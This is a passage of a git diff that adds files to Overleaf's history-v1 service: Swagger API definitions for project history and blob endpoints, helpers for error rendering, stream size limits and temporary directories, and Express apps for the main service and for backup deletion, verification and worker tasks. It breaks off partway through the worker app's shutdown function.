getProjectBlob: expressify(getProjectBlob), + headProjectBlob: expressify(headProjectBlob), + copyProjectBlob: expressify(copyProjectBlob), +} diff --git a/services/history-v1/api/controllers/render.js b/services/history-v1/api/controllers/render.js new file mode 100644 index 0000000..d7d3191 --- /dev/null +++ b/services/history-v1/api/controllers/render.js @@ -0,0 +1,17 @@ +'use strict' + +const HTTPStatus = require('http-status') + +function makeErrorRenderer(status) { + return (res, message) => { + res.status(status).json({ message: message || HTTPStatus[status] }) + } +} + +module.exports = { + badRequest: makeErrorRenderer(HTTPStatus.BAD_REQUEST), + notFound: makeErrorRenderer(HTTPStatus.NOT_FOUND), + unprocessableEntity: makeErrorRenderer(HTTPStatus.UNPROCESSABLE_ENTITY), + conflict: makeErrorRenderer(HTTPStatus.CONFLICT), + requestEntityTooLarge: makeErrorRenderer(HTTPStatus.REQUEST_ENTITY_TOO_LARGE), +} diff --git a/services/history-v1/api/controllers/stream_size_limit.js b/services/history-v1/api/controllers/stream_size_limit.js new file mode 100644 index 0000000..f3a1495 --- /dev/null +++ b/services/history-v1/api/controllers/stream_size_limit.js @@ -0,0 +1,26 @@ +const stream = require('node:stream') + +/** + * Transform stream that stops passing bytes through after some threshold has + * been reached. 
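+ *
+ * Excess bytes are counted but not forwarded, so the stream simply ends with
+ * a truncated body instead of emitting an error; callers must check the
+ * `sizeLimitExceeded` flag afterwards (createProjectBlob does this before
+ * hashing the upload).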
+ */ +class StreamSizeLimit extends stream.Transform { + constructor(maxSize) { + super() + this.maxSize = maxSize + this.accumulatedSize = 0 + this.sizeLimitExceeded = false + } + + _transform(chunk, encoding, cb) { + this.accumulatedSize += chunk.length + if (this.accumulatedSize > this.maxSize) { + this.sizeLimitExceeded = true + } else { + this.push(chunk) + } + cb() + } +} + +module.exports = StreamSizeLimit diff --git a/services/history-v1/api/controllers/with_tmp_dir.js b/services/history-v1/api/controllers/with_tmp_dir.js new file mode 100644 index 0000000..a9c2e9f --- /dev/null +++ b/services/history-v1/api/controllers/with_tmp_dir.js @@ -0,0 +1,27 @@ +const fs = require('node:fs') +const fsExtra = require('fs-extra') +const logger = require('@overleaf/logger') +const os = require('node:os') +const path = require('node:path') + +/** + * Create a temporary directory before executing a function and cleaning up + * after. + * + * @param {string} prefix - prefix for the temporary directory name + * @param {Function} fn - async function to call + */ +async function withTmpDir(prefix, fn) { + const tmpDir = await fs.promises.mkdtemp(path.join(os.tmpdir(), prefix)) + try { + await fn(tmpDir) + } finally { + fsExtra.remove(tmpDir).catch(err => { + if (err.code !== 'ENOENT') { + logger.error({ err }, 'failed to delete temporary file') + } + }) + } +} + +module.exports = withTmpDir diff --git a/services/history-v1/api/swagger/index.js b/services/history-v1/api/swagger/index.js new file mode 100644 index 0000000..3702c6e --- /dev/null +++ b/services/history-v1/api/swagger/index.js @@ -0,0 +1,269 @@ +'use strict' + +const _ = require('lodash') +const paths = _.reduce( + [require('./projects').paths, require('./project_import').paths], + _.extend +) + +const securityDefinitions = require('./security_definitions') +module.exports = { + swagger: '2.0', + info: { + title: 'Overleaf Editor API', + description: 'API for the Overleaf editor.', + version: '1.0', + }, + produces: ['application/json'], + basePath: '/api', + paths, + securityDefinitions, + security: [ + { + jwt: [], + }, + ], + definitions: { + Project: { + properties: { + projectId: { + type: 'string', + }, + }, + required: ['projectId'], + }, + File: { + properties: { + hash: { + type: 'string', + }, + byteLength: { + type: 'integer', + }, + stringLength: { + type: 'integer', + }, + }, + }, + Label: { + properties: { + authorId: { + type: 'integer', + }, + text: { + type: 'string', + }, + timestamp: { + type: 'string', + }, + version: { + type: 'integer', + }, + }, + }, + Chunk: { + properties: { + history: { + $ref: '#/definitions/History', + }, + startVersion: { + type: 'number', + }, + }, + }, + ChunkResponse: { + properties: { + chunk: { + $ref: '#/definitions/Chunk', + }, + authors: { + type: 'array', + items: { + $ref: '#/definitions/Author', + }, + }, + }, + }, + ChunkResponseRaw: { + properties: { + startVersion: { + type: 'number', + }, + endVersion: { + type: 'number', + }, + endTimestamp: { + type: 'string', + }, + }, + }, + History: { + properties: { + snapshot: { + $ref: '#/definitions/Snapshot', + }, + changes: { + type: 'array', + items: { + $ref: '#/definitions/Change', + }, + }, + }, + }, + Snapshot: { + properties: { + files: { + type: 'object', + additionalProperties: { + $ref: '#/definitions/File', + }, + }, + }, + required: ['files'], + }, + Change: { + properties: { + timestamp: { + type: 'string', + }, + operations: { + type: 'array', + items: { + $ref: '#/definitions/Operation', + }, + }, + authors: { + type: 
'array', + items: { + type: ['integer', 'null'], + }, + }, + v2Authors: { + type: 'array', + items: { + type: ['string', 'null'], + }, + }, + projectVersion: { + type: 'string', + }, + v2DocVersions: { + type: 'object', + additionalProperties: { + $ref: '#/definitions/V2DocVersions', + }, + }, + }, + required: ['timestamp', 'operations'], + }, + V2DocVersions: { + properties: { + pathname: { + type: 'string', + }, + v: { + type: 'integer', + }, + }, + }, + ChangeRequest: { + properties: { + baseVersion: { + type: 'integer', + }, + untransformable: { + type: 'boolean', + }, + operations: { + type: 'array', + items: { + $ref: '#/definitions/Operation', + }, + }, + authors: { + type: 'array', + items: { + type: ['integer', 'null'], + }, + }, + }, + required: ['baseVersion', 'operations'], + }, + ChangeNote: { + properties: { + baseVersion: { + type: 'integer', + }, + change: { + $ref: '#/definitions/Change', + }, + }, + required: ['baseVersion'], + }, + Operation: { + properties: { + pathname: { + type: 'string', + }, + newPathname: { + type: 'string', + }, + blob: { + $ref: '#/definitions/Blob', + }, + textOperation: { + type: 'array', + items: {}, + }, + file: { + $ref: '#/definitions/File', + }, + }, + }, + Error: { + properties: { + message: { + type: 'string', + }, + }, + required: ['message'], + }, + Blob: { + properties: { + hash: { + type: 'string', + }, + }, + required: ['hash'], + }, + Author: { + properties: { + id: { + type: 'integer', + }, + email: { + type: 'string', + }, + name: { + type: 'string', + }, + }, + required: ['id', 'email', 'name'], + }, + SyncState: { + properties: { + synced: { + type: 'boolean', + }, + }, + }, + ZipInfo: { + properties: { + zipUrl: { + type: 'string', + }, + }, + required: ['zipUrl'], + }, + }, +} diff --git a/services/history-v1/api/swagger/project_import.js b/services/history-v1/api/swagger/project_import.js new file mode 100644 index 0000000..a93f42d --- /dev/null +++ b/services/history-v1/api/swagger/project_import.js @@ -0,0 +1,147 @@ +'use strict' + +const importSnapshot = { + 'x-swagger-router-controller': 'project_import', + operationId: 'importSnapshot', + tags: ['ProjectImport'], + description: 'Import a snapshot from the current rails app.', + consumes: ['application/json'], + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'snapshot', + in: 'body', + description: 'Snapshot to import.', + required: true, + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + ], + responses: { + 200: { + description: 'Imported', + }, + 409: { + description: 'Conflict: project already initialized', + }, + 404: { + description: 'No such project exists', + }, + }, + security: [ + { + basic: [], + }, + ], +} + +const importChanges = { + 'x-swagger-router-controller': 'project_import', + operationId: 'importChanges', + tags: ['ProjectImport'], + description: 'Import changes for a project from the current rails app.', + consumes: ['application/json'], + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'end_version', + description: 'end_version of latest persisted chunk', + in: 'query', + required: true, + type: 'number', + }, + { + name: 'return_snapshot', + description: + 'optionally, return a snapshot with the latest hashed content', + in: 'query', + required: false, + type: 'string', + enum: ['hashed', 'none'], + }, + { + name: 'changes', + in: 'body', + description: 'changes to be 
imported', + required: true, + schema: { + type: 'array', + items: { + $ref: '#/definitions/Change', + }, + }, + }, + ], + responses: { + 201: { + description: 'Created', + schema: { + $ref: '#/definitions/Snapshot', + }, + }, + }, + security: [ + { + basic: [], + }, + ], +} + +const getChanges = { + 'x-swagger-router-controller': 'projects', + operationId: 'getChanges', + tags: ['Project'], + description: 'Get changes applied to a project', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'since', + in: 'query', + description: 'start version', + required: false, + type: 'number', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + type: 'array', + items: { + $ref: '#/definitions/Change', + }, + }, + }, + }, + security: [ + { + basic: [], + }, + ], +} + +exports.paths = { + '/projects/{project_id}/import': { post: importSnapshot }, + '/projects/{project_id}/legacy_import': { post: importSnapshot }, + '/projects/{project_id}/changes': { get: getChanges, post: importChanges }, + '/projects/{project_id}/legacy_changes': { post: importChanges }, +} diff --git a/services/history-v1/api/swagger/projects.js b/services/history-v1/api/swagger/projects.js new file mode 100644 index 0000000..cd4d233 --- /dev/null +++ b/services/history-v1/api/swagger/projects.js @@ -0,0 +1,588 @@ +'use strict' + +const Blob = require('overleaf-editor-core').Blob + +exports.paths = { + '/projects': { + post: { + 'x-swagger-router-controller': 'projects', + operationId: 'initializeProject', + tags: ['Project'], + description: 'Initialize project.', + consumes: ['application/json'], + parameters: [ + { + name: 'body', + in: 'body', + schema: { + type: 'object', + properties: { + projectId: { type: 'string' }, + }, + }, + }, + ], + responses: { + 200: { + description: 'Initialized', + schema: { + $ref: '#/definitions/Project', + }, + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, + '/projects/{project_id}': { + delete: { + 'x-swagger-router-controller': 'projects', + operationId: 'deleteProject', + tags: ['Project'], + description: "Delete a project's history", + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + ], + responses: { + 204: { + description: 'Success', + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, + '/projects/{project_id}/blobs/{hash}': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getProjectBlob', + tags: ['Project'], + description: 'Fetch blob content by its project id and hash.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'hash', + in: 'path', + description: 'Hexadecimal SHA-1 hash', + required: true, + type: 'string', + pattern: Blob.HEX_HASH_RX_STRING, + }, + { + name: 'range', + in: 'header', + description: 'HTTP Range header', + required: false, + type: 'string', + }, + ], + produces: ['application/octet-stream'], + responses: { + 200: { + description: 'Success', + schema: { + type: 'file', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + security: [{ jwt: [] }, { token: [] }], + }, + head: { + 'x-swagger-router-controller': 'projects', + operationId: 'headProjectBlob', + tags: ['Project'], + description: 'Fetch blob content-length by its project id and hash.', + parameters: [ + { + name: 'project_id', + in: 'path', 
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+        {
+          name: 'hash',
+          in: 'path',
+          description: 'Hexadecimal SHA-1 hash',
+          required: true,
+          type: 'string',
+          pattern: Blob.HEX_HASH_RX_STRING,
+        },
+      ],
+      produces: ['application/octet-stream'],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            type: 'file',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+      security: [{ jwt: [] }, { token: [] }],
+    },
+    put: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'createProjectBlob',
+      tags: ['Project'],
+      description:
+        'Create blob to be used in a file addition operation when importing a' +
+        ' snapshot or changes',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+        {
+          name: 'hash',
+          in: 'path',
+          description: 'Hexadecimal SHA-1 hash',
+          required: true,
+          type: 'string',
+          pattern: Blob.HEX_HASH_RX_STRING,
+        },
+      ],
+      responses: {
+        201: {
+          description: 'Created',
+        },
+      },
+    },
+    post: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'copyProjectBlob',
+      tags: ['Project'],
+      description:
+        'Copies a blob from a source project to a target project when duplicating a project',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'target project id',
+          required: true,
+          type: 'string',
+        },
+        {
+          name: 'hash',
+          in: 'path',
+          description: 'Hexadecimal SHA-1 hash',
+          required: true,
+          type: 'string',
+          pattern: Blob.HEX_HASH_RX_STRING,
+        },
+        {
+          name: 'copyFrom',
+          in: 'query',
+          description: 'source project id',
+          required: true,
+          type: 'string',
+        },
+      ],
+      responses: {
+        201: {
+          description: 'Created',
+        },
+      },
+    },
+  },
+  '/projects/{project_id}/latest/content': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getLatestContent',
+      tags: ['Project'],
+      description:
+        'Get full content of the latest version. Text file ' +
+        'content is included, but binary files are just linked by hash.',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/Snapshot',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+    },
+  },
+  '/projects/{project_id}/latest/hashed_content': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getLatestHashedContent',
+      tags: ['Project'],
+      description:
+        'Get a snapshot of a project at the latest version ' +
+        'with the hashes for the contents of each file',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/Snapshot',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+      security: [
+        {
+          basic: [],
+        },
+      ],
+    },
+  },
+  '/projects/{project_id}/latest/history': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getLatestHistory',
+      tags: ['Project'],
+      description:
+        'Get the latest sequence of changes.' +
+        ' TODO probably want a configurable depth.',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/ChunkResponse',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+    },
+  },
+  '/projects/{project_id}/latest/history/raw': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getLatestHistoryRaw',
+      tags: ['Project'],
+      description: 'Get the metadata of the latest sequence of changes.',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+        {
+          name: 'readOnly',
+          in: 'query',
+          description: 'use read only database connection',
+          required: false,
+          type: 'boolean',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/ChunkResponseRaw',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+    },
+  },
+  '/projects/{project_id}/latest/persistedHistory': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getLatestPersistedHistory',
+      tags: ['Project'],
+      description: 'Get the latest sequence of changes.',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/ChunkResponse',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+    },
+  },
+
+  '/projects/{project_id}/versions/{version}/history': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getHistory',
+      tags: ['Project'],
+      description:
+        'Get the sequence of changes that includes the given version.',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+        {
+          name: 'version',
+          in: 'path',
+          description: 'numeric version',
+          required: true,
+          type: 'number',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/ChunkResponse',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+    },
+  },
+  '/projects/{project_id}/versions/{version}/content': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getContentAtVersion',
+      tags: ['Project'],
+      description: 'Get full content at the given version',
+      parameters: [
+        {
+          name: 'project_id',
+          in: 'path',
+          description: 'project id',
+          required: true,
+          type: 'string',
+        },
+        {
+          name: 'version',
+          in: 'path',
+          description: 'numeric version',
+          required: true,
+          type: 'number',
+        },
+      ],
+      responses: {
+        200: {
+          description: 'Success',
+          schema: {
+            $ref: '#/definitions/Snapshot',
+          },
+        },
+        404: {
+          description: 'Not Found',
+          schema: {
+            $ref: '#/definitions/Error',
+          },
+        },
+      },
+    },
+  },
+  '/projects/{project_id}/timestamp/{timestamp}/history': {
+    get: {
+      'x-swagger-router-controller': 'projects',
+      operationId: 'getHistoryBefore',
+      tags: ['Project'],
+      description:
+        'Get the sequence of changes
' + ' before the given timestamp', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'timestamp', + in: 'path', + description: 'timestamp', + required: true, + type: 'string', + format: 'date-time', + }, + ], + responses: { + 200: { + description: 'Success', + schema: { + $ref: '#/definitions/ChunkResponse', + }, + }, + 404: { + description: 'Not Found', + schema: { + $ref: '#/definitions/Error', + }, + }, + }, + }, + }, + '/projects/{project_id}/version/{version}/zip': { + get: { + 'x-swagger-router-controller': 'projects', + operationId: 'getZip', + tags: ['Project'], + description: 'Download zip with project content', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'version', + in: 'path', + description: 'numeric version', + required: true, + type: 'number', + }, + ], + produces: ['application/octet-stream'], + responses: { + 200: { + description: 'success', + }, + 404: { + description: 'not found', + }, + }, + security: [ + { + token: [], + }, + ], + }, + post: { + 'x-swagger-router-controller': 'projects', + operationId: 'createZip', + tags: ['Project'], + description: + 'Create a zip file with project content. Returns a link to be polled.', + parameters: [ + { + name: 'project_id', + in: 'path', + description: 'project id', + required: true, + type: 'string', + }, + { + name: 'version', + in: 'path', + description: 'numeric version', + required: true, + type: 'number', + }, + ], + responses: { + 200: { + description: 'success', + schema: { + $ref: '#/definitions/ZipInfo', + }, + }, + 404: { + description: 'not found', + }, + }, + security: [ + { + basic: [], + }, + ], + }, + }, +} diff --git a/services/history-v1/api/swagger/security_definitions.js b/services/history-v1/api/swagger/security_definitions.js new file mode 100644 index 0000000..5b80a97 --- /dev/null +++ b/services/history-v1/api/swagger/security_definitions.js @@ -0,0 +1,17 @@ +'use strict' + +module.exports = { + jwt: { + type: 'apiKey', + in: 'header', + name: 'authorization', + }, + basic: { + type: 'basic', + }, + token: { + type: 'apiKey', + in: 'query', + name: 'token', + }, +} diff --git a/services/history-v1/app.js b/services/history-v1/app.js new file mode 100644 index 0000000..261f100 --- /dev/null +++ b/services/history-v1/app.js @@ -0,0 +1,172 @@ +'use strict' + +/* eslint-disable no-console */ + +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const config = require('config') +const Events = require('node:events') +const BPromise = require('bluebird') +const express = require('express') +const helmet = require('helmet') +const HTTPStatus = require('http-status') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const bodyParser = require('body-parser') +const swaggerTools = require('swagger-tools') +const swaggerDoc = require('./api/swagger') +const security = require('./api/app/security') +const healthChecks = require('./api/controllers/health_checks') +const { mongodb, loadGlobalBlobs } = require('./storage') +const path = require('node:path') + +Events.setMaxListeners(20) +const app = express() +module.exports = app + +logger.initialize('history-v1') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) + +// We may have fairly large JSON bodies 
when receiving large Changes. Clients +// may have to handle 413 status codes and try creating files instead of sending +// text content in changes. +app.use(bodyParser.json({ limit: '6MB' })) +app.use( + bodyParser.urlencoded({ + extended: false, + }) +) + +security.setupSSL(app) +security.setupBasicHttpAuthForSwaggerDocs(app) + +const HTTP_REQUEST_TIMEOUT = parseInt(config.get('httpRequestTimeout'), 10) +app.use(function (req, res, next) { + res.setTimeout(HTTP_REQUEST_TIMEOUT) + next() +}) + +app.get('/', function (req, res) { + res.send('') +}) + +app.get('/status', healthChecks.status) +app.get('/health_check', healthChecks.healthCheck) + +function setupSwagger() { + return new BPromise(function (resolve) { + swaggerTools.initializeMiddleware(swaggerDoc, function (middleware) { + app.use(middleware.swaggerMetadata()) + app.use(middleware.swaggerSecurity(security.getSwaggerHandlers())) + app.use(middleware.swaggerValidator()) + app.use( + middleware.swaggerRouter({ + controllers: path.join(__dirname, 'api/controllers'), + useStubs: app.get('env') === 'development', + }) + ) + app.use(middleware.swaggerUi()) + resolve() + }) + }) +} + +function setupErrorHandling() { + app.use(function (req, res, next) { + const err = new Error('Not Found') + err.status = HTTPStatus.NOT_FOUND + return next(err) + }) + + // Handle Swagger errors. + app.use(function (err, req, res, next) { + const projectId = req.swagger?.params?.project_id?.value + if (res.headersSent) { + return next(err) + } + + if (err.code === 'SCHEMA_VALIDATION_FAILED') { + logger.error({ err, projectId }, err.message) + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json(err.results) + } + if (err.code === 'INVALID_TYPE' || err.code === 'PATTERN') { + logger.error({ err, projectId }, err.message) + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json({ + message: 'invalid type: ' + err.paramName, + }) + } + if (err.code === 'ENUM_MISMATCH') { + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json({ + message: 'invalid enum value: ' + err.paramName, + }) + } + if (err.code === 'REQUIRED') { + return res.status(HTTPStatus.UNPROCESSABLE_ENTITY).json({ + message: err.message, + }) + } + next(err) + }) + + app.use(function (err, req, res, next) { + const projectId = req.swagger?.params?.project_id?.value + logger.error({ err, projectId }, err.message) + + if (res.headersSent) { + return next(err) + } + + // Handle errors that specify a statusCode. Some come from our code. Some + // bubble up from AWS SDK, but they sometimes have the statusCode set to + // 200, notably some InternalErrors and TimeoutErrors, so we have to guard + // against that. We also check `status`, but `statusCode` is preferred. + const statusCode = err.statusCode || err.status + if (statusCode && statusCode >= 400 && statusCode < 600) { + res.status(statusCode) + } else { + res.status(HTTPStatus.INTERNAL_SERVER_ERROR) + } + + const sendErrorToClient = app.get('env') === 'development' + res.json({ + message: err.message, + error: sendErrorToClient ? 
err : {}, + }) + }) +} + +app.setup = async function appSetup() { + await mongodb.client.connect() + logger.info('Connected to MongoDB') + await loadGlobalBlobs() + logger.info('Global blobs loaded') + app.use(helmet()) + await setupSwagger() + setupErrorHandling() +} + +async function startApp() { + await app.setup() + + const port = parseInt(process.env.PORT, 10) || 3100 + app.listen(port, err => { + if (err) { + console.error(err) + process.exit(1) + } + Metrics.event_loop.monitor(logger) + Metrics.memory.monitor(logger) + }) +} + +// Run this if we're called directly +if (!module.parent) { + startApp().catch(err => { + console.error(err) + process.exit(1) + }) +} diff --git a/services/history-v1/backup-deletion-app.mjs b/services/history-v1/backup-deletion-app.mjs new file mode 100644 index 0000000..81b2b5b --- /dev/null +++ b/services/history-v1/backup-deletion-app.mjs @@ -0,0 +1,81 @@ +// @ts-check +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import { promisify } from 'node:util' +import express from 'express' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import { hasValidBasicAuthCredentials } from './api/app/security.js' +import { + deleteProjectBackupCb, + healthCheck, + healthCheckCb, + NotReadyToDelete, +} from './storage/lib/backupDeletion.mjs' +import { mongodb } from './storage/index.js' + +const app = express() + +logger.initialize('history-v1-backup-deletion') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) + +function basicAuth(req, res, next) { + if (hasValidBasicAuthCredentials(req)) return next() + res.setHeader('WWW-Authenticate', 'Basic realm="Application"') + res.sendStatus(401) +} + +app.delete('/project/:projectId/backup', basicAuth, (req, res, next) => { + deleteProjectBackupCb(req.params.projectId, err => { + if (err) { + return next(err) + } + res.sendStatus(204) + }) +}) + +app.get('/status', (req, res) => { + res.send('history-v1-backup-deletion is up') +}) + +app.get('/health_check', (req, res, next) => { + healthCheckCb(err => { + if (err) return next(err) + res.sendStatus(200) + }) +}) + +app.use((err, req, res, next) => { + req.logger.addFields({ err }) + if (err instanceof NotReadyToDelete) { + req.logger.setLevel('warn') + return res.status(422).send(err.message) + } + req.logger.setLevel('error') + next(err) +}) + +/** + * @param {number} port + * @return {Promise<http.Server>} + */ +export async function startApp(port) { + await mongodb.client.connect() + await healthCheck() + const server = http.createServer(app) + await promisify(server.listen.bind(server, port))() + return server +} + +// Run this if we're called directly +if (process.argv[1] === fileURLToPath(import.meta.url)) { + const PORT = parseInt(process.env.PORT || '3101', 10) + await startApp(PORT) +} diff --git a/services/history-v1/backup-verifier-app.mjs b/services/history-v1/backup-verifier-app.mjs new file mode 100644 index 0000000..856a15d --- /dev/null +++ b/services/history-v1/backup-verifier-app.mjs @@ -0,0 +1,117 @@ +// @ts-check +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import { promisify } from 'node:util' +import { 
setTimeout } from 'node:timers/promises' +import express from 'express' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import { healthCheck } from './backupVerifier/healthCheck.mjs' +import { + BackupCorruptedError, + verifyBlob, +} from './storage/lib/backupVerifier.mjs' +import { mongodb } from './storage/index.js' +import { expressify } from '@overleaf/promise-utils' +import { Blob } from 'overleaf-editor-core' +import { loadGlobalBlobs } from './storage/lib/blob_store/index.js' +import { EventEmitter } from 'node:events' +import { + loopRandomProjects, + setWriteMetrics, +} from './backupVerifier/ProjectVerifier.mjs' + +const app = express() + +logger.initialize('history-v1-backup-verifier') +Metrics.open_sockets.monitor() +Metrics.injectMetricsRoute(app) +app.use(Metrics.http.monitor(logger)) +Metrics.leaked_sockets.monitor(logger) +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) + +app.get( + '/history/:historyId/blob/:hash/verify', + expressify(async (req, res) => { + const { historyId, hash } = req.params + try { + await verifyBlob(historyId, hash) + res.sendStatus(200) + } catch (err) { + logger.warn({ err, historyId, hash }, 'manual verify blob failed') + if (err instanceof Blob.NotFoundError) { + res.status(404).send(err.message) + } else if (err instanceof BackupCorruptedError) { + res.status(422).send(err.message) + } else { + throw err + } + } + }) +) + +app.get('/status', (req, res) => { + res.send('history-v1-backup-verifier is up') +}) + +app.get( + '/health_check', + expressify(async (req, res) => { + await healthCheck() + res.sendStatus(200) + }) +) + +app.use((err, req, res, next) => { + req.logger.addFields({ err }) + req.logger.setLevel('error') + next(err) +}) + +const shutdownEmitter = new EventEmitter() + +shutdownEmitter.once('shutdown', async code => { + logger.info({ code }, 'shutting down') + await mongodb.client.close() + await setTimeout(100) + process.exit(code) +}) + +process.on('SIGTERM', () => { + shutdownEmitter.emit('shutdown', 0) +}) + +process.on('SIGINT', () => { + shutdownEmitter.emit('shutdown', 0) +}) + +/** + * @param {number} port + * @param {boolean} enableVerificationLoop + * @return {Promise<http.Server>} + */ +export async function startApp(port, enableVerificationLoop = true) { + await mongodb.client.connect() + await loadGlobalBlobs() + await healthCheck() + const server = http.createServer(app) + await promisify(server.listen.bind(server, port))() + enableVerificationLoop && loopRandomProjects(shutdownEmitter) + return server +} + +setWriteMetrics(true) + +// Run this if we're called directly +if (process.argv[1] === fileURLToPath(import.meta.url)) { + const PORT = parseInt(process.env.PORT || '3102', 10) + try { + await startApp(PORT) + } catch (error) { + shutdownEmitter.emit('shutdown', 1) + logger.error({ error }, 'error starting app') + } +} diff --git a/services/history-v1/backup-worker-app.mjs b/services/history-v1/backup-worker-app.mjs new file mode 100644 index 0000000..b21e55a --- /dev/null +++ b/services/history-v1/backup-worker-app.mjs @@ -0,0 +1,70 @@ +// @ts-check +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' +import http from 'node:http' +import { fileURLToPath } from 'node:url' +import { promisify } from 'node:util' +import express from 'express' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import { expressify } from '@overleaf/promise-utils' +import { drainQueue, healthCheck } 
diff --git a/services/history-v1/backup-worker-app.mjs b/services/history-v1/backup-worker-app.mjs
new file mode 100644
index 0000000..b21e55a
--- /dev/null
+++ b/services/history-v1/backup-worker-app.mjs
@@ -0,0 +1,70 @@
+// @ts-check
+// Metrics must be initialized before importing anything else
+import '@overleaf/metrics/initialize.js'
+import http from 'node:http'
+import { fileURLToPath } from 'node:url'
+import { promisify } from 'node:util'
+import express from 'express'
+import logger from '@overleaf/logger'
+import Metrics from '@overleaf/metrics'
+import { expressify } from '@overleaf/promise-utils'
+import { drainQueue, healthCheck } from './storage/scripts/backup_worker.mjs'
+const app = express()
+
+logger.initialize('history-v1-backup-worker')
+Metrics.open_sockets.monitor()
+Metrics.injectMetricsRoute(app)
+app.use(Metrics.http.monitor(logger))
+Metrics.leaked_sockets.monitor(logger)
+Metrics.event_loop.monitor(logger)
+Metrics.memory.monitor(logger)
+
+app.get('/status', (req, res) => {
+  res.send('history-v1-backup-worker is up')
+})
+
+app.get(
+  '/health_check',
+  expressify(async (req, res) => {
+    await healthCheck()
+    res.sendStatus(200)
+  })
+)
+
+app.use((err, req, res, next) => {
+  req.logger.addFields({ err })
+  req.logger.setLevel('error')
+  next(err)
+})
+
+async function triggerGracefulShutdown(server, signal) {
